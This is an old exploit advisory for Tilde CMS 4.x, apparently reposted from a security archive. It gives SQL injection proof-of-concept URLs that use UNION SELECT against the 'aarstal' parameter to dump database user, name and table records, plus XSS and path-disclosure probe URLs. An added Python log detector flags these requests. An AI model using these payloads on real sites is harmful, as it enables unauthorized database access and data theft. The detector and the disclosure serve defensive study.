Tilde CMS <= v. 4.x "aarstal" parameter of "yeardetail" SQL Injection

2007.11.29
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89

---------------------------------------------------------------
Http://www.inj3ct-it.org
Staff[at]inj3ct-it[dot]org
---------------------------------------------------------------
Tilde CMS <= v. 4.x "aarstal" parameter of "yeardetail" SQL Injection
---------------------------------------------------------------
#By KiNgOfThEwOrLd
---------------------------------------------------------------
PoC

D'u need an explanation?!? i don't think so :P
---------------------------------------------------------------
SQL Injection

http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=%27

Little examples

Using the user() and database() functions u can get some information about the database, as:

http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,user(),database(),5/*

Or u can get some records from the database like:

http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,[row_name],4,[row_name]/**/from/**/[table_name]/*

D'u want the tables n' the rows? Find it yourself ;P
---------------------------------------------------------------
something else..

Xss Vulnerability

http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=[XSS]
---------------------------------------------------------------
Full Path Disclosure

http://[target]/[tilde_path]/index.php?search=%3C&mode=search&sider=on&tss=on&linier=on
---------------------------------------------------------------
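The "aarstal" parameter is a year, so a defender can flag any request to mode=yeardetail whose aarstal value is not a short integer, and separately flag the "<" search probe used for the path disclosure. The following detector over constructed web-server log lines is an added example written for this page; it is not part of the advisory or of Tilde CMS, and the host, paths and IP addresses in the sample log are placeholders.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlparse

# Constructed sample access-log lines (placeholder host/paths), modelled on
# the request shapes described in the advisory above.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Nov/2007:10:00:01 +0100] "GET /tilde/index.php?id=12&mode=yeardetail&aarstal=2007 HTTP/1.1" 200 5120
10.0.0.9 - - [29/Nov/2007:10:00:07 +0100] "GET /tilde/index.php?id=12&mode=yeardetail&aarstal=%27 HTTP/1.1" 500 812
10.0.0.9 - - [29/Nov/2007:10:00:12 +0100] "GET /tilde/index.php?id=12&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,user(),database(),5/* HTTP/1.1" 200 5300
10.0.0.7 - - [29/Nov/2007:10:01:00 +0100] "GET /tilde/index.php?search=%3C&mode=search&sider=on&tss=on&linier=on HTTP/1.1" 200 2200
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
YEAR_RE = re.compile(r"^\d{1,4}$")  # aarstal ("year") should be a small integer
SQL_RE = re.compile(r"union|select|'|--|/\*", re.IGNORECASE)


def inspect_request(url: str) -> Optional[str]:
    """Return a finding label for one request URL, or None if it looks benign."""
    parsed = urlparse(url)
    if not parsed.path.endswith("/index.php"):
        return None
    qs = parse_qs(parsed.query, keep_blank_values=True)  # values are URL-decoded here
    mode = qs.get("mode", [""])[0]
    if mode == "yeardetail" and "aarstal" in qs:
        value = qs["aarstal"][0]
        if not YEAR_RE.match(value):
            # Collapse the /**/ comment spacing so 'union/**/select' reads as words.
            if SQL_RE.search(value.replace("/**/", " ")):
                return "sqli:aarstal"
            return "anomalous:aarstal"
    if mode == "search" and "<" in qs.get("search", [""])[0]:
        return "probe:search"
    return None


def scan_log(log_text: str) -> List[Tuple[str, str]]:
    """Return (client_ip, finding) pairs for every suspicious request in the log."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            label = inspect_request(m.group(1))
            if label:
                findings.append((line.split()[0], label))
    return findings


if __name__ == "__main__":
    for ip, label in scan_log(SAMPLE_LOG):
        print(ip, label)
```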


Copyright 2019, cxsecurity.com